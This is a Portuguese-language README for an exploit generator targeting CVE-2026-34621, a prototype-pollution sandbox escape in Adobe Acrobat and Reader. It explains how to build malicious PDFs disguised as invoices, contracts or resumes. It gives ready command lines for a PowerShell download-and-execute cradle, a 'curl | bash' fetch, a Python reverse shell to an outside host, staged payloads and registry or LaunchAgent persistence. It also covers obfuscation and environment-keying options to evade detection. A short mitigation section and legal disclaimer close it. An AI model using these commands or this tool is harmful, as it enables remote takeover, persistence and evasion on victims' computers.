
Um gerador de exploits sofisticado e multiplataforma para **CVE-2026-34621** – uma vulnerabilidade crítica de poluição de protótipo no Adobe Acrobat e Reader que leva à fuga da sandbox e à execução arbitrária de código no Windows e macOS.
Um gerador de exploits sofisticado e multiplataforma para CVE-2026-34621 – uma vulnerabilidade crítica de poluição de protótipo no Adobe Acrobat e Reader que leva à fuga da sandbox e à execução arbitrária de código no Windows e macOS.
⚠️ AVISO IMPORTANTE
Esta ferramenta destina-se apenas a pesquisas de segurança autorizadas e testes de penetração.
O uso não autorizado contra sistemas que você não possui ou para os quais não tem permissão explícita por escrito para testar é ilegal. O autor não assume nenhuma responsabilidade por uso indevido.
CVE-2026-34621 é uma vulnerabilidade de dia zero no Adobe Acrobat e Reader que permite a um atacante:
Este gerador cria um arquivo PDF malicioso que, quando aberto em uma versão vulnerável do Adobe Reader, executa automaticamente um payload adaptado ao sistema operacional da vítima.
Plataformas de Destino Suportadas:
| Categoria | Capacidades |
|---|---|
| Payloads Multiplataforma | Detecta automaticamente o SO e seleciona o método de execução de comandos apropriado para Windows ou macOS. |
| Múltiplos Vetores de Execução | cmd.exe, PowerShell, WScript.Shell (Windows) / Terminal.app, osascript (macOS). |
| Payloads em Estágios | Baixa e executa payloads de segundo estágio a partir de uma URL remota. |
| Persistência | Instala chave Run no registro (Windows) ou LaunchAgent (macOS). |
| Técnicas de Evasão | Três níveis de ofuscação de JavaScript, chaveamento por ambiente, atrasos de execução, código polimórfico. |
| Incorporação em PDF Isca | Mescla o exploit em um PDF de aparência legítima (requer PyPDF2). |
| Múltiplos Gatilhos | OpenAction, ação de abertura de página ou JavaScript em nível de documento. |
| Relatórios Abrangentes | Relatórios em HTML, TXT e JSON detalhando a configuração do payload. |
git clone https://github.com/NULL200OK/CVE-2026-34621-Exploit.git
cd CVE-2026-34621-Exploit
python3 -m venv venv
source venv/bin/activate # Linux/macOS
venv\Scripts\activate # Windows
O script principal usa apenas a biblioteca padrão do Python. Para o recurso de mesclagem de PDF isca, instale o PyPDF2:
pip install PyPDF2
Gere um PDF básico que abre a calculadora no Windows e no macOS:
python3 cve_2026_34621_advanced.py -o test.pdf
Isso cria:
test.pdf – O arquivo PDF malicioso.
test_report.html – Relatório HTML detalhado.
test_report.txt – Resumo em texto simples.
test_config.json – Exportação da configuração em JSON.
Comandos para Windows
1-Cenário Comando
A-Popup básico do calc.exe
python cve_2026_34621_advanced.py -o invoice.pdf --win calc.exe
Reverse shell com PowerShell
python cve_2026_34621_advanced.py -o contract.pdf --win "powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\""
Payload em estágios com persistência
python cve_2026_34621_advanced.py -o resume.pdf --win calc.exe --stage http://192.168.1.100/payload.exe -p
Chaveamento por ambiente (executar apenas em "SALES-PC")
python cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe -k SALES-PC
Com nível de ofuscação 2 e atraso de 10 segundos
python cve_2026_34621_advanced.py -o delayed.pdf --win calc.exe -O 2 -d 10
Comandos para macOS
2-Cenário Comando
Abrir a Calculadora
python cve_2026_34621_advanced.py -o invoice.pdf --mac "open /System/Applications/Calculator.app"
Baixar e executar script
python cve_2026_34621_advanced.py -o update.pdf --mac "curl -s http://10.0.0.5/mac_payload.sh | bash"
Reverse shell via Python
python cve_2026_34621_advanced.py -o shell.pdf --mac "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"
Persistência via LaunchAgent
python cve_2026_34621_advanced.py -o persist.pdf --mac "open /Applications/Calculator.app" -p
Incorporação em um PDF Isca
python cve_2026_34621_advanced.py -o safe_invoice.pdf -l /path/to/real_invoice.pdf --trigger pageopen
3-Nota sobre Testes em Dispositivos Móveis
O script em si é executado em desktop (Windows/macOS/Linux) para gerar o PDF. O PDF gerado pode ser aberto em dispositivos Android ou iOS, mas:
As versões móveis do Adobe Acrobat Reader não são vulneráveis ao CVE-2026-34621.
O payload acionará um fallback de demonstração benigno (abre uma URL ou exibe um alerta) em vez de executar comandos do sistema.
Opção Descrição
-o, --output ARQUIVO Obrigatório. Nome do arquivo PDF de saída.
--win CMD Comando do Windows a executar (padrão: calc.exe).
--mac CMD Comando do macOS a executar (padrão: open /System/Applications/Calculator.app).
--stage URL URL para baixar o payload de segundo estágio.
-p, --persistence Instala mecanismo de persistência (Registry/LaunchAgent).
-O, --obfuscate NÍVEL Nível de ofuscação de JavaScript (0=nenhum, 1=básico, 2=intermediário, 3=avançado).
-d, --delay SEGUNDOS Atrasa a execução pelo número de segundos especificado.
-k, --key NOME_DO_HOST Chaveamento por ambiente – executa apenas em hostname correspondente.
-l, --lure PDF Caminho para um PDF legítimo a ser usado como isca (mescla o exploit).
--trigger TIPO Vetor de gatilho: openaction, pageopen ou doclevel.
--no-reports Pula a geração de relatórios HTML/TXT/JSON.
--seed N Define a semente aleatória para geração polimórfica reproduzível.
Cadeia de Ataque
Poluição de Protótipo:
O JavaScript incorporado modifica Object.prototype para injetar propriedades maliciosas (__trusted, privileged, etc.). Isso confunde o limite de confiança do mecanismo JavaScript da Adobe.
Escalonamento de Contexto
Devido ao protótipo poluído, o mecanismo trata incorretamente o JavaScript não confiável do documento como se estivesse sendo executado em um contexto privilegiado.
Acesso a APIs Privilegiadas
O script agora pode chamar APIs restritas como app.launchURL, util.readFileIntoStream e app.trustedFunction.
Fuga da Sandbox
Essas APIs permitem acesso ao sistema de arquivos e execução de processos fora da sandbox da Adobe.
Execução Arbitrária de Código
O script executa o comando do atacante usando métodos específicos do SO:
Windows: cmd.exe /c, PowerShell ou WScript.Shell.
macOS: manipulador de URL do Terminal.app ou osascript.
Níveis de Ofuscação
Nível Descrição
0 Sem ofuscação – JavaScript simples e legível.
1 Literais de string convertidos para String.fromCharCode, nomes de variáveis aleatorizados.
2 Nível 1 + injeção de código morto e comentários inúteis.
3 Script inteiro codificado em base64 e envolvido em eval(atob(...)), depois re-ofuscado.
Produto Trilha Versões Vulneráveis Versão Corrigida
Adobe Acrobat DC Contínua ≤ 26.001.21367 26.001.21411
Adobe Acrobat Reader DC Contínua ≤ 26.001.21367 26.001.21411
Adobe Acrobat 2024 Clássica ≤ 24.001.30356 24.001.30362 (Win) / 24.001.30360 (macOS)
Atualize Imediatamente: Aplique as atualizações de segurança mais recentes da Adobe.
Desative o JavaScript no Adobe Reader: Editar → Preferências → JavaScript → desmarque "Habilitar JavaScript do Acrobat" (observação: isso quebra algumas funcionalidades do PDF).
Use Visualizadores de PDF Alternativos: Considere usar navegadores ou visualizadores de terceiros que não sejam afetados.
Contribuições são bem-vindas, mas observe:
Todas as solicitações de pull devem ser para pesquisa defensiva, melhorias de detecção ou aprimoramentos de relatórios.
Não aceitamos contribuições que aumentem a capacidade ofensiva da ferramenta além do necessário para testes legítimos.
Para contribuir:
Faça um fork do repositório.
Crie um branch de funcionalidade.
Envie uma solicitação de pull com uma descrição clara das alterações.
Este projeto é fornecido apenas para fins educacionais e de testes de segurança autorizados.
Ao usar este software, você concorda que é responsável por cumprir todas as leis e regulamentos aplicáveis.
O autor isenta-se de toda responsabilidade por qualquer uso indevido ou dano causado por esta ferramenta.